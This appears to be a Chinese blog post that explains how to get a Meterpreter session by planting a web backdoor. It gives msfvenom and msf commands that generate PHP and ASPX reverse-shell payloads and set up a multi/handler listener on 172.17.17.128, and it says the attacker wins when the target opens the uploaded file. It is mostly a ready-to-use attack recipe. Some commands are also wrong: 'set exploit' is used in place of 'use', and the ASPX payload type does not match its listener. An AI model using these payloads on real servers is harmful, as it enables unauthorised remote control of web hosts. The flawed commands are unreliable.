美文网首页
利用web后门取得meterpreter的两种方式

利用web后门取得meterpreter的两种方式

作者: 孤独的一颗星 | 来源:发表于2022-08-15 14:17 被阅读0次

    web后门是大家常用的后门之一,现介绍两种web后门,方便各位用来获得meterpreter,一种是php反弹shell木马,另一种是aspx反弹shell木马。

    一、php反弹shell

    利用msfvenom工具生成php反弹shell:

    msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

    -p 表示使用类型为payloads

    -f  表示输出的文件格式

    接着,在msf中设置监听:

    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 172.17.17.128
    run

    一旦攻击对象通过浏览器点开shell.php文件,msf会获得返回的meterpreter,此时攻击成功。

    2、aspx反弹shell

    aspx meterpreter后门与上述后门类似,首先使用下列命令调用漏洞模块,并设置相关参数

    use windows/shell_reverse_tcp
    set lhost 172.17.17.128
    set lport 4444
    generate -h 查看该模块使用方法
    generate -f aspx

    此时会生成一段aspx代码,把代码复制到一个文档中,命名shell.aspx。

    在msf中设置监听:

    set exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 172.17.17.128
    set lport 4444
    run

    最后,将shell.aspx传入web服务器目录下,在浏览器中打开该文件,稍等片刻便能取得meterpreter。

    相关文章

      网友评论

          本文标题:利用web后门取得meterpreter的两种方式

          本文链接:https://www.haomeiwen.com/subject/nnnrgrtx.html